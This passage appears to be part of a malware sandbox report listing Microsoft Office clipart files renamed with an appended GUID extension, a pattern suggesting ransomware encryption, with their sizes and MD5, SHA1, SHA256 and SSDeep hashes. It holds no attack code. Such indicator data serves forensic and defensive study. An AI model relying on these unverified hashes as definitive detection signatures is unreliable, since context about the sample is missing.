SSDeep: 768:rnJtZEIvelOA7gE9HTRNV+8ZTJY9KxZs6rtVxF79huhACJQJcjqEbTlcn8wuFoxQ:3fviZTt7D6QiEnGiz2Ox4TZCZEXNd
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153307.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.09 KB MD5: cd16dae4091cac507b656ead9d455ac4
SHA1: a51665fc65b62934265d9e368f947b466829e25b
SHA256: fe220bb6e36dae3549ab20ba31e8c3009b3d610488dc43606ba83d3b668e366f
SSDeep: 384:ytgrszjUhQlPqrIJp+8hA+/nXstIvgu53XkADmwd6UcxHTYQF910HBuBVXhUyn5m:KgrsvUUPWIJp+8hA+PMIIuxXksZ3cdT+
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153313.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.56 KB MD5: 283f11c2581e0c132dba64d29a3f16d3
SHA1: 0263a1daa58aafa0e787ab759c0f74d904770ad8
SHA256: 44865cc9e7d90ed5a8a2f08aa9628aa00fbf24134f32c4ff0558878a7d8b9717
SSDeep: 384:TywFf5aTXuJHOyDmVkmxF6+bz0wPTU7DieomSfEHHI8ZfhYdCKf7fm+AGouPWZYk:TywFfET+JuqMkmxs+bzvPTeDieomjHHj
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153508.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.45 KB MD5: 191bd63c174995d2829a169bfbcbf63e
SHA1: be838540ff91047768c2498cc3aaffded1ad5c7e
SHA256: c8e01775d88b2434ebac649db140bf0b7ac4cd8a3b1f05d90754af2f737b7b91
SSDeep: 768:aIdByQ6AwsDLHKa/IROt6FADr9AdwJTb99PrrTir78xOXBJSEylEGKQYjH5MOCkm:B2dY7hr/w/iES1X3
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153514.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.45 KB MD5: cc186567e76101fe1931825bff7131c9
SHA1: a375c2f91eb3ce4d393609b4fb8dcde9bb6da05c
SHA256: 4c6f8e1bd9bfda0cabc3311757df50ef500e4ebaf08a32c5731fbf03d1e9213f
SSDeep: 384:UlHQKkN4iF340MmfuxK7Hnbe1RBTfyLBAJRPdN2PLPb2gDsj8nuv2lrE+FpKSsyz:UlHQKkNlF340MmfuxKLnbe1RBTqLBAJM
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153518.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.24 KB MD5: 7b26b372ed9c95b8847ea477cacdf005
SHA1: 818c11a68975fde3ba1a6c77b79a74ebe68f3326
SHA256: 94ecd925210596404a722be3336cbe09b7f1e2cf9543390c0b80ba0d8f87a0fa
SSDeep: 384:68/O1N/r5NUNEaF+iCv0B3fQfcee4BWKgFRs1WYnzGZoze49bzfCX+TbU5UPUzdV:68/OXrvUSaF+iCv0hfQfcVRKgFRsgYns
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0156537.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.34 KB MD5: f90f2d747f1ccf706a9c595175ae47b8
SHA1: 3dfb5fe9f293830a097a8ea3b99c04875ba87cc0
SHA256: b18a99799950416458490b15ba2eecf0ec129e53b2e0d17a09374f32624e7cf6
SSDeep: 24:t//Y0phf5IB4gXoim8OrL2V9wqO5Rd2Uuef6G9bWpONSJeQ/ycLuXUFQIw27bKfA:1/FhqB4gYT8OrLsF1UMpON3SCiiW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157167.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 45.61 KB MD5: 2fdd165e64697c6a61351e1549544d29
SHA1: c672a1894e028143f5edd4cb38e6454ee332a32b
SHA256: f5706d17645045d81414509e307c0a665e252fcba21d8f73ce85c1c3046a911c
SSDeep: 768:pNpDrkCISoJxUa0R3q+lOsP+RTjZKL9fdiyYfV5jrdLUIafJFD8c7wK7p1M8Z7C+:QSWUvuaU19UJFYJUMa7LkNPRqcTLACk7
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157177.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 21.21 KB MD5: 68a89e5e504de028e6a72c92e9251b1d
SHA1: a2aa28f54e1c1f9e32768bb71d83cb2c7c297436
SHA256: 5ff579db00b27df5a5501d2e03c16eb287bb8f670375ef2ae607cb1eb88207d1
SSDeep: 384:7fWweGGcxFGbJTa4fGp+uMOHbqoLMWJGdKw0kY8CMLnlGtN152SP/h1w8gVetcmY:7fWweGnxFGbJTa4fDuMsbqoLMWJw0kYa
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157191.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.49 KB MD5: 1c95c794a7a51e98597cb0dcbdd6176c
SHA1: ecda45a230af98746bd8cf3daa3c9d899fe2ab32
SHA256: 6353e619ecd69e6f95677bef0340883c482778aaaf7b67a1ff57fe6699ea9c55
SSDeep: 384:HsYBX0Ka1do1UnfGW7u/Ta4lMF2gEhizAHGe4s/mcNn52r4UobcLdLHvraVAZGBa:HsYBX0h1do1cGW7u/TaIMF2gEhizOF/S
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158071.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 18.22 KB MD5: cf5069d825f12fb3dcffb05d198f01ad
SHA1: 401ce2563b4b36b45397ee9416f9144762a841ca
SHA256: cd207d7cdd5e0fb0c8bce2c8f169fbb335b9cdf86e4cd89e437f516095e5e32d
SSDeep: 384:DrTFfwLI3N3dAUH+IPGqBjVae8mSconepmSOCu+mi9qxCGGJWfnkK52MbSj+qOxs:DrTpwLydXeEJj4e8mSzepmSOCu+mi9qI
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 45.40 KB MD5: 4a0f4b184c3154689cc6cb49e44b8c07
SHA1: 08c93e52fcdfdeacd6dd741093d9771c849c67ed
SHA256: 9550259ab5b5742cfc6cf9c96607bf20e69c91b94ccd8860bc425a077554a91d
SSDeep: 768:WgBvAvP6bf++Hjhl5eAIPwgAwOlILo+CgfPTrwqT3jpzdV4cOpzabCUo:WgBvAotl5egaLopgfv7jpxecOha6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171685.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.13 KB MD5: ac91394122ccbb6754eb2334901ef468
SHA1: e2160bc9e57abea1b948cef6209c6c835381f454
SHA256: 0731fae9e14e5d838206ae1be6bca145abbf8c5c07fc984a17c67e27e2773ac5
SSDeep: 384:XQa86tYWEoD+B+fUukZMl1oipX0Ez+UcbzKExh2JU6a4e7eO:XQa86nEoqkrkZMDoYZQbuExhCUlP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171847.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.73 KB MD5: 252708d0878b6b60818e61d0b5fb41b4
SHA1: 087f2516c7e7bf6fbbe872383bf88ff265f3b41a
SHA256: ce959d63b54235b9facffc949ca8f537b85c1cef33b15c78fa8c1fa1bfc6a736
SSDeep: 192:zc/QewbJ7VO3Q5q1UvU3kNlGSy+zFvPJKwtoXCoprD5WD:zc/QHbO3Q5q1U+kNlGSy+zFXJKw6xpro
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172193.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.40 KB MD5: a0f4f9c03a67f31eea66f46cfad176ee
SHA1: 3a8f2a3a2640ccc74fb32989f727060104b46cb4
SHA256: d833a30411cd268eb9971ac96d05f87ffa8164ca684b5911eea8353b0eaced87
SSDeep: 384:v6vMNENnIXQwTqIEbbceser4pCQN/W5Oig4Ecwhckt3lO8ROmTkzdCmh3BdV/keR:SvaENnqQwTqIEncesu4pCQxW5OigRhcB
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174315.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.73 KB MD5: 0f67e426bb5a711d3d5e99f443827b4f
SHA1: 31b6065ec146c858a9501aab48811fca588c7993
SHA256: fb695a882af9ce8456d635d5fc2c2620a946ae44762661a5922c043d561d7a1f
SSDeep: 96:EpJ+0OOhg/WdWN9CSseriAYt6+V2/LS0gqzQqFPy/t+AckcEyQliTybmvyWczlC4:ED+0OxWdS9CS5iAYt6q2/LS0gmQqFPCl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174635.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 9.51 KB MD5: 5fe4921788537703f88c269e5467f60c
SHA1: 336ac1482d28029bc144a6dd931f346620c98018
SHA256: 90417b3c3b5b2d0373f1b66611402e83f69ac59602480ca28dec7f36376d6978
SSDeep: 192:Wkfu0sbbhyxzzXsQmBVoipo0bG1eZ/4Soh/m0cH27cmqsUYCeREw4GDYlJRJ9dWY:Wkfu0cbh8z8QmBVo2o0bG84Th/m7yczL
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 24.40 KB MD5: f5ffca15d2b5a36e9fc0eee9443e55f1
SHA1: 07610c9b3ba6e6f04fe08a2e2a28b6d8a0112bbd
SHA256: 446cc1e77f7b695d37ae2e501ac988a3d0568c485c7f30f011f1cfd21e04d1d9
SSDeep: 384:zonKXsSkaJTQ4cBPFLiMmhQXhLNibOhcmBWpyr9u5kpbSHPMYkjE+UizzYYP:zoKXEXgfhQXhLNiOWIWpyrNZabEkusYP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 45.37 KB MD5: a6bac605be781569366ccb0ce48fb85f
SHA1: 817488279e15e557e217296b19042f64154434cd
SHA256: cadd33459455916596ea6924824782b1b45a38dea37bb5707afb738390fbb21b
SSDeep: 768:F0gy5MSpxSnG/P0LL/HKekG0xBl5TiuKrtxZXkT6uEkfz9FQ7p48gRdvbxdHf6v:l9YxcGIL/4xf9YrjqEkfz7ZdjxEv
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 44.30 KB MD5: ade07aad9a4b88b23927ab31bb00527a
SHA1: 02f389091768b42cdc72f67ac832503968673e71
SHA256: 1d8b6096176583829cf6266fba1f5940ca46a906757c539adf97e998f249b6e0
SSDeep: 768:WCrd1FzJtOArdmfjMpoJ1hqhKdolNsqO/8vQpsCjC2xPP0x0yBNc6Z5Ybpz6BcD2:WCr1+Ax5s7UXzOCI1CokGycE5Ybpzp3C
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 36.12 KB MD5: 6fbf760d0998b470f3282e4dc95f70b6
SHA1: 32ade7b03350ed9d31fd29c95febc6a014e92c54
SHA256: 25f28fcc4dafd9fd6df80096feba06d5f57bd9a467fbe99f34051714ff606a92
SSDeep: 768:ZkWhtjL1V0j5BaxKBEI36u0iY1K+quG2BO0QmaMJ0aXEn5Rr4ql:ZXCrtZ385qp2BO0kMqT5RNl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 25.91 KB MD5: 9f90041450de6894686aada2e57e373a
SHA1: 8b69105d55fbe138cb59d848135a8a97cccb6eef
SHA256: 75d5f5b482e51603f6ca0848b4b1436ce421809b2b334919892167231c805951
SSDeep: 768:RraNm7quuRp2cddAOUdK3os7PJNjNepeOVXF5Ad:RMpbddAOUQ35DjNPO5nAd
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.47 KB MD5: 3bf6c160255b7b628fd59af15b7fb6ad
SHA1: 8a0a7f752926ce316208e7a21069ccf26c6b4a3e
SHA256: 7c7a0c717dbcd32386a6be4718e17863844b5b8a170addbafe1b5565b75c1f3e
SSDeep: 384:b0gcq19zfo4k+CEI1UaCmAOmX6w4OUXwVZF6c9K6tX0SIaDt1UHMJUy3QPnd8EL/:b+q1hfdZtrKwdUW6ks+AsiyAPnCEA6D
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 22.79 KB MD5: d332a17a12068066f69b5ceac326ef07
SHA1: a738aed78a6e5c3973aa95430fe4ab330982d0d4
SHA256: 452ce890d4e39b9a3440718c040a5230fad7c2bede902a073b6b13751e1ceae1
SSDeep: 384:C69UxWeHF06eJX4SRyPeTqsDM2NW7sG85m+454BkN3UZflq8O:9aNDeHqeVAoc58s+454BkkRlqb
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 31.29 KB MD5: 8be77196d9b5953e67b0f740a9c22e09
SHA1: 723b5e9ba50b0469a1b09e53dcc5160e6b57f481
SHA256: 35bfe4746d438bacbebe033aa74cd2b826db61f152bc22fee55a22702caf8c23
SSDeep: 768:qrblLbtuuVu6e0CdfiwdNLdG3qSuvo7SWT4W8h:ql/see0ul5/ZvoLT0
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 34.51 KB MD5: 7ea098ae7ff3d7c2b5c0f220bf903b94
SHA1: 2e0e84b24325ab14e9ceecf64be0c46d59f65baa
SHA256: 749437d8170e6660fc9a8d3076f4d3d0e34b0e3a070e896e19c33db331996c11
SSDeep: 768:mtrhTqklybkUNt/lWMNUtkMuDXyvg7Jtny7JX90tqvxsHEbJ:m5htlYt/lTUGMuDXEgtncJX90AOOJ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 31.36 KB MD5: e8ec64b77bb9ea00b4a963a13d28a0c8
SHA1: d6f5f4549050715e29c454c6d567c72542b681b3
SHA256: 762666b17cdf73fe310f22e2a2abfeb970172a75e5c784574b52c3b91412f784
SSDeep: 768:d2sotiO+nqZWZtPJxQu6kno0WqcacPJjGXFbLFM/ZsI7XBKLcK:d2xUO+bZtIqoFRYLMZsMOF
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.23 KB MD5: 23e885d9e39f9fcf54090a8cf88de495
SHA1: 0b483983c47fcf6131a8b34f381440195069b197
SHA256: 865070fe8cecdd837546d60960af61150757e6473303dfc2f5e6948848ca7294
SSDeep: 384:LM4EjWzF4zQBRPAYgOStXO+gwrLs/exmroaW4Qer4Z3jKCfG86l5hXj:aKF48zlgOs5rLsWOovVLZ3jKCyl/z
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182888.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.82 KB MD5: fa930634bd175a73af31d8c03903dc9a
SHA1: 77315007c4b1afcc3a16ef035d0d67efe290ac97
SHA256: 7935a235c700a773f93913f0eeda4bab432fa9310f91e4e8414adac1c83d3737
SSDeep: 384:4W3a5ofcpvT7zpZsyaOSylbOEfRtwwjbAzmVnjZQRR+4N2jF4SBRcf+OUME3P7Cp:4n5ofcpvT7zpZsyaOSylbOEfRtwwjbAx
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183172.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 29.09 KB MD5: 2d9535a466255bc92ba7cd695d5d8c93
SHA1: f9077ef671690008cc7cb13d52ccab05dc86f110
SHA256: be6722b9ece4034982ad0873f274c9bf398f27a4b88ec0d32ecad0c2172e71c6
SSDeep: 768:m4sZt/CWxXa7r+yL3LkqT+ms02saRSjkWwPc24PFtpM3ygKzie03lUD3iBy8DJZp:XUXe5D3bMVaWX
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183574.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 18.82 KB MD5: 610078a7cfa5ff633822d3719ab5f9aa
SHA1: eab1a8cdf86e20e3147c3ea0eca7cef4d64797e8
SHA256: 27dfb0ec5595ff5bb9c6a067e33240b556ba825e2be9e6a0649bc50419afd7ac
SSDeep: 384:vksJqJlgIrJdC8hkhjoshkc2wlpOW3Zmq+o7CKZ1Koa56laZBhG3pLmkj8qJ9//F:vksYJlgIj/U1EwLOW3gq+o7C+1Q56lyE
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185670.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.13 KB MD5: 947173e0de6bd36fdba738a918cc8891
SHA1: 583b92ac5d8cb0c8172cf05306cf1029e454ae3e
SHA256: 652851efac64d87b2df3040579461d151336c821cc3ae59f81b0172000ea6143
SSDeep: 192:KvMriYWJIKb8EWKClgnWY0tBiliinE2mYyEYsXT06TlTXTTITCTOT8CTsTfTkc5E:KvMrZWJIY8EignX0tBi4inE2mDEYsXL6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185774.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 19.57 KB MD5: 551145399e7fb3a64614ae4b06c1c661
SHA1: 332a652d5209cf57a3ae982e9ad0c51bd7b8fa9d
SHA256: ae731576be878c91a30e43d7041e323c71bfd82d4c76a59056975e4269d910ac
SSDeep: 384:Zo3rhxJemDNRKX7CvYAAYT9bDt+RrMlGfMe5ccN/Vbw42wLmwAJFgz7trdd9k1g2:Zo3FxJeUNW7CoI9bDtzlGfMe5ccN/Vbw
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185776.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 26.46 KB MD5: 47288a7a89af6074eedfff5177f4abab
SHA1: e2722229c1e831c4dd34feacfa232418b49583d5
SHA256: f761757e530cbccfd8752035b77f765bd86b8c498eeb3a139fb696c8d1f6dbb7
SSDeep: 768:a3BoywS44NSw7/TLX7jlBzSD7wl8jBSYnucSXExCqKevjhE7ytMhtHO5uI0cPhYR:+DHi6bm3E1v
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185780.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 58.33 KB MD5: 2a6a6ef4de28cc6c2f48f797aeab25b5
SHA1: 67dd8a1d67d091a5d2b66d326abbddafff2d0315
SHA256: 2c089de82db5228080bdfe9290b771db9e53bd033c23270dacd1d4b1035f425d
SSDeep: 1536:hCzZgUuM+G9oUoupVfEdInOAxL9Gga9hgF:hCzLlSUsdIr9XIh+
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 20.18 KB MD5: 736993ace4291ab411e538bef6a58646
SHA1: 20bcab2f980104cd9db42f2c284b5e9d4bc20871
SHA256: 2d3763031e9236f1f059b2b4c46ee974cbd42b7deb54b2bda332da5ac6d30f31
SSDeep: 384:nbQiH9XgRmjbMR0qoZVYsIEkDE4xTYv71TbHa0o+nSTKGHCDqYUa5q2160LDO57c:nbQg9QRm3MR0qoZVYsIEkDE4xTYv7RbV
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185796.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 25.26 KB MD5: 01a6e13313727a78eddd38a521ae9bbb
SHA1: 8ecb76798bac408c4b7ecbc86f0fe8c1b0e2704b
SHA256: c952ef5c6ce5b4a8db7880797965df0dd54e10e0e8696b0a56b1e650a27c3ece
SSDeep: 768:+ubFlBeXS9TDsXsoPNwaAFLZ6pTRecU2NNaWWoL08y+vb2uocT/DEz87tQwoMeTb:D/YS1rSLmj
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185828.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.61 KB MD5: 95b47962002c35a8ea7fdecd83b8fbe4
SHA1: d3d55ce0864251372fb2e60524ba80fdbdd11a47
SHA256: 9aa14750ccf4961f345bdc1590edc54837d43e65c53fee876d78a6ed2178a19b
SSDeep: 192:0UjqR8ImOpPBdoCl9eovrkRHFpOG/2BtCGFaH8Nbh2EW7BY6VEvCkEdMf6xGOohZ:0U2R8ImOp5doCl9eOrkRHFpOG/etCGFl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186346.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.46 KB MD5: 3458eb5a258e0ccf7ec23ba8578eeb8a
SHA1: a8057d1df15f6675371542f5040dbec7b373d67f
SHA256: 0e295057496d84c579614ccf38c4bb7a92234f0f32e8dd704a1a35f6162272f6
SSDeep: 192:30faXZUcsBjFgQ4Pby6SdgV1C8hSIZMUVQ6Uh76h90+Qb9FkCDpTo3Yt5u3w4tJ/:30faXZtsBBgQwbyPdSgahZRehGh90+QS
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186360.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.06 KB MD5: d4ddef0a810fe0641f0e5ce11f5baeec
SHA1: 9fec29561616cd0f5e568d954a9e4085c1748203
SHA256: 27da5ed026b61be3fa778991e074ed0548d5ef28d1ffbe45d8e6cd90422e7450
SSDeep: 768:OPuhUYcOwLobILW5cbDGV+WMaAMBndkCo5UtZAFYswXCGEULyu1xDduCtG1uFr6k:4mAZwx+yfZKtS3r
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186362.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.25 KB MD5: 8dc9e7923bfda4bc5ee33a8ef38908ed
SHA1: 32753c63f2506fb6feb74cde73076fd7261dbeb4
SHA256: 6b91150ef3b1dc72d7bc5167c942bb234745eb1473764a5d610763eb5722ed52
SSDeep: 384:ooDJfASGPWok5vy3/iOc3wVnMNNudsuzzEnLx8KvOPULVgUMci1GxZPGMn9WNm/7:VDJfASGPWok5vQ/iOcAVnMNNudsuzzC3
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187647.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.44 KB MD5: 848529dadf6625acf18a5bc38a73e746
SHA1: 3a01b76207b5a9c20325bc219f7ebd2c7486011f
SHA256: ebfec8db64524cbfce5066b10cc464e1a1fb44d7ad19d70f9f0fa17fb0bff724
SSDeep: 192:J5fGGnxiiGAR7KTBGf3WJTPlW6JRNuYTy6grEJtXVCmVjzvP/t:J5fGGnxxJR7KTBGfiPlW6JRsf6grEJtT
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.25 KB MD5: 6cc4a451305293b219ce8a23379577a2
SHA1: 13c9ed1f366c8ee535639b345b7a8d9db5d20d06
SHA256: f11d73db156f09b3f2b1279e303181a6c45d45a5a504e0fcfee3c9e90529789b
SSDeep: 96:9aTfQvkobhWtE/pg5mbmnGcGqObd0EgdPm9TNjk9jpEfKCHrifiWqTbT2vpdTdTU:0TfOkostE/W5moBGqOJzghm9TNjsrCLn
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187819.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.11 KB MD5: f3e9e34ec1131c53ffbadde18340d1d7
SHA1: d7519a0612bccda74b99a25d581fd63f75d7968c
SHA256: 4403fcba18f66db5b69722fb007e523aacb0b5009dfe11f7ce6206a62bc1ea4e
SSDeep: 192:g8ssvibbA4YX17pp/cME8/BlhHTMaU0UOOahs00k4Ui65m/Zomemrx8vK1+1CU5x:g8ssvibEFF/dE8/B/HIad7OahsFUi65F
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187825.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.33 KB MD5: 30b23aed1fd4c169c0df901f14c022ee
SHA1: ff1b46031881005bd123f530b5eea5e0e88f812d
SHA256: de8a8a2a01a29ea1079e0493ab2ae1b0505b49323d5c577d0b5c0e54b5f1b27a
SSDeep: 192:052022ih6mtm3Jrjm/JSlOT3mMjk6EWmzo7mUeDTJcRDeJwlBh4V09998D:052J2g6uMJrjeJSlOT3mMjDHYoCUeDT9
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187829.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.06 KB MD5: fd3d75a350494f154ed92c1f05f4d4ff
SHA1: 4a052c44155b0f22479c2588c04af32ad27d63f2
SHA256: ce1aeaed6c24254b7d5401783a226869300439903706f479424f807c94482f4b
SSDeep: 384:7k8mMm7BdkZ0ja+k3WxmTpSp7UC/MBahgimZaRD0d5zkRBNbtx2AzVf/6fLMw0:7nmMm7BdkZ0ja+k3Wx+pSp7UC/MBahgG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187835.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 9.13 KB MD5: 5557dad15ab616e403711d1b6bc0b60e
SHA1: d1a66bef1c7a240f4564c0b1f21cc93b8a32d0e6
SHA256: 03f316e740dc340a9b1c68d233f809c64cdc5695fa11becb5c35a501f791e41b
SSDeep: 192:9k6QVZ38JuuzGQDKk0LZnt7ShBmTNzIKGRh4m4+E5MkjwteeHRc8KreU5oVsqU4f:9FIZ+fZmkoZt7CmTNzjG8mfqVjwteReR
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187837.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.97 KB MD5: 9230aa1e0c63d8a59abb8bb3bf3b3da5
SHA1: 29ee10daeb29652f8226c4edebd0d78689161628
SHA256: 56f5e88ddfe32b554a8d2e39dcf4f1659c2518358eedc1cd9d69f764cd84a8e4
SSDeep: 384:HGGZTko7ORyqActdC435qtXmz4d45Xe21FSrX+Zp/C+yrwN1n8yEa73qk6P94S5T:HGM57ORyJctE4pqlmcd45Xe21FyuZpa7
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187839.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.25 KB MD5: f26d21b744764edee3695b0b043f77f5
SHA1: 44da02cdc5f6e863f9f11e6a99fc138c83772ac5
SHA256: 905e1d78892db53cb881a55f7e4a02eb39154b1d8eb81c4f936c70551b99a7de
SSDeep: 96:TJvpCDSsH271zcUOjQyP2l2ro94ZKLVg3BcHPDAT4wVIV8maAkWBA9oJ+zRtLkIg:FRCusHg1jaQKAc+4ZQVg3BcHbAJyN5SG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187849.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.40 KB MD5: 6bb94d96e31adfb54fc28b9dd5c8ef6d
SHA1: be3092300f7751f1d771576b2c04d765fa2d0c43
SHA256: c5a35c74c7a2b59928c2d53fbb9e122237892f18a9cfcfeaa02fd2df6087c407
SSDeep: 192:mYLYwTDZTDTBTlfTtTvrTgTpTzgTlTSTLTuTpTpTTTz9Oyz8Z3Tq1SF0taPuRQV6:mYUwZH1pfZTrU9/gp+/C9d/X9OyzKjqX
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187859.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.67 KB MD5: e26b4ab4149899d3d38df48facd7ce28
SHA1: de92564956485496bf7fdb130b7a0fde76615029
SHA256: e637ae9f218256dd0d35f47587bc9e4160e63985c5c6d4363e300746a834f6a9
SSDeep: 48:1iaB4gYT8S4pns6OIkb3syMb3Psb3Ub3Uwb30b3kIdJJsb3q4b3sz9b3Wb3itdbM:ccJHps6YTbMTPsTUTbT0TkIdJaTq4TWm
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187881.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.59 KB MD5: 3db7d35e0e03b06c182148a70044ac1d
SHA1: a6aa0b1b54b637302f0dbd40c060637ed1e410e8
SHA256: 7f7266eacd2a4df6b99624c2037b58a1ce376477992be835c372223292dbd62a
SSDeep: 96:SJIeWMU+GQAWHx2DBHyRbbxTXYocZB9iEMLbYiy3hzGw391yAU1QvSX/DxFTd4:oIeA+G8Rk5y99TXxcAE2bFyxzGw391yK
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187883.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.05 KB MD5: 8ec6212fb5a8ec387c2b442498033b69
SHA1: ff76ec6c216b84a264dde5dcb7241d7e62def7b9
SHA256: f26a44984a93a84a6be1cfd0d1ee6cf65e3c4b7525120bffb7493f69b4e85c45
SSDeep: 48:1NB4gYT8vgQg/jegh5dUAaHhHbj6mr86uBaGZYOeW:fJvgQiF52AeHxrOcPS
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188511.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.47 KB MD5: 17ddc99bbdeb2e80e835e2013d734d15
SHA1: 00d9aff0fbb3d10b66f6800e1e82b788279b1cf7
SHA256: 5a5d5d98be607076a6260d8d9b49ffe0fe1f78689ec31084efcfbe9bbc8715c5
SSDeep: 192:IPz4Z1A7V4pObykmzXjhs7o3yKE5WGGb+R4T/tVgoTKI/d6ug+UZxXUiNwVv6VeZ:s0Z1Axik0XG70GHR4TkI/d6ugLZxXUiC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188513.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.00 KB MD5: e37f6db10cf20985d3eedb3a5e567cef
SHA1: f32a4d65fb4342780ccd1bb1b197bd721f4c843b
SHA256: d45b69e56c1d1fe47255ddf98741676156bd126041bd36e4ddfe05df2118eca0
